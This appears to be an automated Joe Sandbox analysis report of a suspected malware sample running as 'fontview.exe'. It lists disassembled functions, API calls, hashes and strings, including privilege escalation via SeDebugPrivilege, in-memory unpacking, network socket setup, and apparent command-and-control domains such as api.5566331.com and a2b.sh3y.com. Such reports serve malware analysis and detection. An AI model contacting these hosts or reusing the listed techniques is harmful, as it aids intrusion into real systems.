Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_H_prologInternal_throw_exception_malloc
String ID: \
API String ID: 1756248435-2967466578
Opcode ID: 1934921e5e3eba9dbe1ebf20acfb8ba0b5c0ccb354e30b11263ced142b908a9b
Instruction ID: 999b7ef00291c24b21c61d77de65a700904c34b1fa21d5ee172efdb26d2e93fb
Opcode Fuzzy Hash: 1934921e5e3eba9dbe1ebf20acfb8ba0b5c0ccb354e30b11263ced142b908a9b
Instruction Fuzzy Hash: 542180B2E002159FDB04DF98C881A6EBBB5EF45790F11802AE914AB355CB70DA00CBD5

Function 100168F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100168F9

Part of subcall function 10002F31: _memmove.LIBCMT ref: 10002F99

Strings

Global\, xrefs: 10016919, 10016921, 1001693D, 10016945
sadfasdf, xrefs: 10016901

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog_memmove
String ID: Global\$sadfasdf
API String ID: 3529519853-3816382148
Opcode ID: 874b96898145c5f955ea80f4427b7f34e6a07471e49c37df447fe611d2904711
Instruction ID: b6ddd2b14e4a5dec44897576bf73c7027d8addb5aa797be0a8d53e5c108f34b1
Opcode Fuzzy Hash: 874b96898145c5f955ea80f4427b7f34e6a07471e49c37df447fe611d2904711
Instruction Fuzzy Hash: 860162B5600245AFE704DF698C41BBFB7ADFB84350F10052AB415D3681CBB46A4486A0

Function 10004472 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10004477
wsprintfA.USER32 ref: 100044BA

Strings

%.2X, xrefs: 100044AE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prologwsprintf
String ID: %.2X
API String ID: 1529278910-213608013
Opcode ID: 612573fd24853ed19d8b92dd1d664a9c2feef3bd0967048898b0e64a18457f45
Instruction ID: ab478701061cdb77f35751579b8944a13045e9843e2e555ae6caed241adfc7f2
Opcode Fuzzy Hash: 612573fd24853ed19d8b92dd1d664a9c2feef3bd0967048898b0e64a18457f45
Instruction Fuzzy Hash: 9D012176D00159ABDB00DFD9C881AEFFBB8FF48255F50446EE956E7201D734AA448BE0

Function 1000BD40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000BD45

Part of subcall function 1000BC48: __EH_prolog.LIBCMT ref: 1000BC4D

GetLastError.KERNEL32(10065258,?,00000000,?,?,?,10006353), ref: 1000BD74

Part of subcall function 1000C8B3: __vwprintf_p.LIBCMT ref: 1000C8C4

Strings

$ %sServer Start Fail --> %s (%d) [%d], xrefs: 1000BD82

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$ErrorLast__vwprintf_p
String ID: $ %sServer Start Fail --> %s (%d) [%d]
API String ID: 1262451674-3173535527
Opcode ID: c2c585b0af37396207c6818f7f438401da5fd370e116ff001cf2518456425cb0
Instruction ID: 3b1fed85a229fe3c3dd31323b3895a1ff75fef0c5f6b30761a08204955dbf93b
Opcode Fuzzy Hash: c2c585b0af37396207c6818f7f438401da5fd370e116ff001cf2518456425cb0
Instruction Fuzzy Hash: F6018175900149AFEB08DBA4CD9AEFEB779EF91255F14486DB011A3142EF706E04CB60

Function 1000BF85 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000BF8A

Part of subcall function 1000BC48: __EH_prolog.LIBCMT ref: 1000BC4D

GetLastError.KERNEL32(10065258,?,00000000,?,?,?,10010EF5,?,?,?,00000000,1001106F,?,?,00000000,000003F1), ref: 1000BFB9

Part of subcall function 1000C8B3: __vwprintf_p.LIBCMT ref: 1000C8C4

Strings

$ %sClient Start Fail --> %s (%d) [%d], xrefs: 1000BFC7

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$ErrorLast__vwprintf_p
String ID: $ %sClient Start Fail --> %s (%d) [%d]
API String ID: 1262451674-3845868111
Opcode ID: 4d9c736134dfcb5ee01bef30f32d39b64bc527b63c599545b06c6a19efabda61
Instruction ID: a3f8479d2f1a97d83587bd67424716dad1497a1e395a593b9db06d3e0decfbcb
Opcode Fuzzy Hash: 4d9c736134dfcb5ee01bef30f32d39b64bc527b63c599545b06c6a19efabda61
Instruction Fuzzy Hash: 42018175900149AFEB08DBA4CD9AEFEB779EF91254F54486DA011A3142EF706E04CB60

Function 10011361 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

CoCreateGuid.OLE32(?), ref: 1001138D
_fprintf.LIBCMT ref: 100113A5
__snprintf.LIBCMT ref: 100113F3

Strings

create guid error, xrefs: 10011397

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CreateGuid__snprintf_fprintf
String ID: create guid error
API String ID: 2959897907-1010078425
Opcode ID: 4cea7cf2b984337b4d7d4ffe6108a3fc19ca67f450e3d562278f7069529bb91a
Instruction ID: 88e1e5261fbf5aae0ab1c042631421d14db4c6bfa5234099037d4dc45f47e2ec
Opcode Fuzzy Hash: 4cea7cf2b984337b4d7d4ffe6108a3fc19ca67f450e3d562278f7069529bb91a
Instruction Fuzzy Hash: 5BF0B4B2D082846FEF06D7B0DC86EDD3FB8DB11645F004116E900DF183EA64E689CB91

Function 1000BCD6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000BCDB

Part of subcall function 1000BC48: __EH_prolog.LIBCMT ref: 1000BC4D

Part of subcall function 1000C8B3: __vwprintf_p.LIBCMT ref: 1000C8C4

Strings

0.0.0.0, xrefs: 1000BD02
$ %sServer Start OK --> (%s#%d), xrefs: 1000BD10

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$__vwprintf_p
String ID: $ %sServer Start OK --> (%s#%d)$0.0.0.0
API String ID: 4225948685-2468510531
Opcode ID: 381a7653acad3b12b10e74cf2f37dbe3eafdcfa24e9c6e4b79a234bb1e2237d5
Instruction ID: 9b943f2d4cba46cc5a067f3d4b275ad2c43369875d3c3dbf6459743123f560cf
Opcode Fuzzy Hash: 381a7653acad3b12b10e74cf2f37dbe3eafdcfa24e9c6e4b79a234bb1e2237d5
Instruction Fuzzy Hash: FCF0677491064AABEF08CBA0CE66EFEB332EB51205F104469A01226192EF756B08CB10

Function 1001AF9E Relevance: 5.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014), ref: 1001AFCC
SetLastError.KERNEL32(0000007E,?,1001B32E,?,?,?,?,000001C8), ref: 1001B0DD

Part of subcall function 10034365: _malloc.LIBCMT ref: 10034371

IsBadReadPtr.KERNEL32(?,00000014), ref: 1001B0A9
SetLastError.KERNEL32(0000007F,?,?,?,?,000001C8), ref: 1001B0C4

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLastRead$_malloc
String ID:
API String ID: 2118469604-0
Opcode ID: f8a972bfd25c9ce03c998134bf18affddbe35a2f0b4b24ffc98d565020eec25a
Instruction ID: 876cb2573bcba37d2384ddbd3581199b9326302aba0ee61cd12ffa339c10c994
Opcode Fuzzy Hash: f8a972bfd25c9ce03c998134bf18affddbe35a2f0b4b24ffc98d565020eec25a
Instruction Fuzzy Hash: 5B416571A00A05DFEB25CF69D888B6BB7F5FF88304B11886DE565DB691EB31E940CB10

Analysis Process: fontview.exePID: 5772, Parent PID: 6568COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1908
Total number of Limit Nodes:	26

Executed Functions

Function 1001D6D7 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 183
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 1001D70D
WSAGetLastError.WS2_32 ref: 1001D71B
htons.WS2_32(?), ref: 1001D736
htonl.WS2_32(00000000), ref: 1001D73F
htons.WS2_32(?), ref: 1001D753
setsockopt.WS2_32(?,0000FFFF,00000020,?), ref: 1001D77C
setsockopt.WS2_32(?,0000FFFF,00001005,?,00000004), ref: 1001D796
setsockopt.WS2_32(?,0000FFFF,00001006,?,00000004), ref: 1001D7A8
bind.WS2_32(?,?,00000010), ref: 1001D7B6

Strings

res, xrefs: 1001D817, 1001D81C, 1001D82C
req, xrefs: 1001D7F6, 1001D7FB, 1001D803

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: setsockopt$htons$ErrorLastbindhtonlsocket
String ID: req$res
API String ID: 3993217638-3551752921
Opcode ID: cedc8808c09bb2cc55dd2f956e691977e6684bca6089a6c735cfa8a9fca93f80
Instruction ID: 1bc47685fa1208dc3a93f9195926757f6b3397a19b8973d8ec54e6f16cbb67a6
Opcode Fuzzy Hash: cedc8808c09bb2cc55dd2f956e691977e6684bca6089a6c735cfa8a9fca93f80
Instruction Fuzzy Hash: 9961A0B1408745AFE300EF64CC81AABBBECFF85354F40491AF69586190D771ED58CB92

Function 10006146 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165sleepthreadCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000614B
CreateThread.KERNEL32(00000000,00000000,1001D91A,?,00000000,00000000), ref: 100062EE

Part of subcall function 1001E124: TerminateThread.KERNEL32(?,00000000), ref: 1001E13D
Part of subcall function 1001E124: CloseHandle.KERNEL32(?), ref: 1001E146
Part of subcall function 1001E124: CreateThread.KERNELBASE(00000000,00000000,1001D388,?,00000000,00000000), ref: 1001E159

Part of subcall function 1001DF0D: gethostname.WS2_32(?,00000100), ref: 1001DF22

__time64.LIBCMT ref: 100061B8

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

Part of subcall function 10008C40: __EH_prolog.LIBCMT ref: 10008C45

Part of subcall function 1001E0D0: TerminateThread.KERNEL32(?,00000000), ref: 1001E0F5
Part of subcall function 1001E0D0: CloseHandle.KERNEL32(?), ref: 1001E0FE
Part of subcall function 1001E0D0: CreateThread.KERNELBASE(00000000,00000000,Function_0001D145,?,00000000,00000000), ref: 1001E111

Sleep.KERNEL32(000003E8,?,?,?,?,00000000), ref: 100061DE
__time64.LIBCMT ref: 100061F4
Sleep.KERNELBASE(1005AFD4), ref: 10006224
__time64.LIBCMT ref: 1000622B

Strings

0.0.0.0, xrefs: 1000630F

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Thread$Create__time64$CloseH_prologHandleSleepTerminateTime$FileSystem__aulldivgethostname
String ID: 0.0.0.0
API String ID: 1676007256-3771769585
Opcode ID: 3cb74091c6fcd31c574afb467b97beec77a2ce808bb828e89382d77d929e7311
Instruction ID: edc6faf32b4ddbc48c22d14bf9bbfd6284b9bbf4270abf8aa5e2a7a96d60cd1e
Opcode Fuzzy Hash: 3cb74091c6fcd31c574afb467b97beec77a2ce808bb828e89382d77d929e7311
Instruction Fuzzy Hash: 7651C2759006419FEB14DF74C888ADE77E6FF08384F248479E95ADB14BDB34A984CB60

Function 1001DFCB Relevance: 13.6, APIs: 9, Instructions: 69networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 1001DFE9
WSAGetLastError.WS2_32 ref: 1001DFF7

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ErrorLastsocket
String ID:
API String ID: 1120909799-0
Opcode ID: 77141d96e2b12b2691b9b20e9abebc24394108544499b08578934dcb4d0342ba
Instruction ID: 715bde583ba2571ee879b219f8558a55a2540612a220d1531e37932013ff7162
Opcode Fuzzy Hash: 77141d96e2b12b2691b9b20e9abebc24394108544499b08578934dcb4d0342ba
Instruction Fuzzy Hash: 0D21B730640759BFE7219B648C8AFAEBBB8EF48B10F104225F715AA1E0D7F09985DB51

Function 100021EB Relevance: 10.6, APIs: 7, Instructions: 81memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002209
GlobalAlloc.KERNEL32(00000040,00000001,?,?,00000001,10011CC0,?,?,00000000,00000001), ref: 10002221
GetAdaptersInfo.IPHLPAPI(00000000,00000001), ref: 10002236
inet_addr.WS2_32(000001B0), ref: 1000225D
inet_addr.WS2_32(000001D8), ref: 1000228F
SendARP.IPHLPAPI(00000000,00000000,00000000,?), ref: 100022A5
GlobalFree.KERNEL32(00000000), ref: 100022B7

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: AdaptersGlobalInfoinet_addr$AllocFreeSend
String ID:
API String ID: 3182797412-0
Opcode ID: 3bc0c3656b43d898c1dcc0318dd50a3af21fe7f04e09f680aee56353fb724470
Instruction ID: 66c9d7adb0e976905d06d262638f06281183517b136eb4124925cbb498e8f50e
Opcode Fuzzy Hash: 3bc0c3656b43d898c1dcc0318dd50a3af21fe7f04e09f680aee56353fb724470
Instruction Fuzzy Hash: 38214175900616BBEB01DBF4CC48AAEBBF8FF05394F114156E905D3254E730DA41CBA0

Function 1001C2A5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(000F01FF,?,?,?,?,?,1001A9E0), ref: 1001C2B5
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,1001A9E0), ref: 1001C2BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 1001C2D2
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 1001C302
CloseHandle.KERNEL32(?,?,?,?,?,1001A9E0), ref: 1001C30F

Strings

SeDebugPrivilege, xrefs: 1001C2CA

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 3038321057-2896544425
Opcode ID: 3bb28a26806963a37a50b2d642aff77d8b6aff36f4a1d932f5d8d3c926a25b6e
Instruction ID: 79d661b54e262ca987bee1b9e957b190e0284badbbec8ecc12dccea534644da2
Opcode Fuzzy Hash: 3bb28a26806963a37a50b2d642aff77d8b6aff36f4a1d932f5d8d3c926a25b6e
Instruction Fuzzy Hash: 2301A871A00229ABEB10DFA5CC59EEFBFBCEF04744F444055E515E6190E7709A44DBA1

Function 0082023D Relevance: 4.9, APIs: 3, Instructions: 444memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,00003000,00000004), ref: 00820487
LoadLibraryA.KERNELBASE(?), ref: 00820574
VirtualProtect.KERNELBASE(?,?,?,?), ref: 0082072B

Memory Dump Source

Source File: 00000006.00000003.2336009620.0000000000820000.00000020.00000400.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_3_820000_fontview.jbxd

Yara matches

Similarity

API ID: Virtual$AllocLibraryLoadProtect
String ID:
API String ID: 1403325721-0
Opcode ID: 77c83f8555da116ba0e5fbc178fc9a47aacc6526824b735187460a15de1f09d0
Instruction ID: 81e179e7621e7a7407589590c9823b404329f22684aa4cd284f05b5857b04705
Opcode Fuzzy Hash: 77c83f8555da116ba0e5fbc178fc9a47aacc6526824b735187460a15de1f09d0
Instruction Fuzzy Hash: 2F022471A083119FC714CF29D590A2ABBE5FF98714F05896EE889DB352D770E880CF92

Function 10005BE6 Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 320
synchronizationnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 10005C19
CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 10005CB7
_sprintf.LIBCMT ref: 10005D14
CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,?), ref: 10005D90
_sprintf.LIBCMT ref: 10005DE0

Strings

live, xrefs: 10005F9D
c1werjkdi%42&!#456, xrefs: 10005D19
c1werjkdi%42&!#012, xrefs: 10005EB3
wktcp.61611.live, xrefs: 1000602E
api., xrefs: 10005FBB
p.61, xrefs: 10005F87
5566, xrefs: 10006002
5566, xrefs: 10005FC6
com, xrefs: 10005FDC
a2b.sh3y.com, xrefs: 10005D02
api., xrefs: 10005FFA
c1werjkdi%42&!#789, xrefs: 10005DE5
tki.bb5483b.com, xrefs: 10005DCE
611., xrefs: 10005F92
wktc, xrefs: 10005F7C
agi.vh748yy.com, xrefs: 10005E9C
331., xrefs: 1000600D
com, xrefs: 10006018
api.5566331.com, xrefs: 1000604E
331., xrefs: 10005FD1
api.5566331.com, xrefs: 1000603E
%s%s, xrefs: 10005D0E, 10005DDA, 10005EA8

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CreateMutex_sprintf$Startup
String ID: %s%s$331.$331.$5566$5566$611.$a2b.sh3y.com$agi.vh748yy.com$api.$api.$api.5566331.com$api.5566331.com$c1werjkdi%42&!#012$c1werjkdi%42&!#456$c1werjkdi%42&!#789$com$com$live$p.61$tki.bb5483b.com$wktc$wktcp.61611.live
API String ID: 2582006962-90602932
Opcode ID: a648b2a21ab5c042c7d270c22a95162fe31f6e84e11910633d817b1941a738a5
Instruction ID: 58b0ecb6076ab785b7a927ea96f25bffcb0b9f035f233e99f1965f63245a51b2
Opcode Fuzzy Hash: a648b2a21ab5c042c7d270c22a95162fe31f6e84e11910633d817b1941a738a5
Instruction Fuzzy Hash: C5D17FB440C780AEE325DF60CC81FEBB7E8EB95344F44492DF19D46182DB75A549CBA2

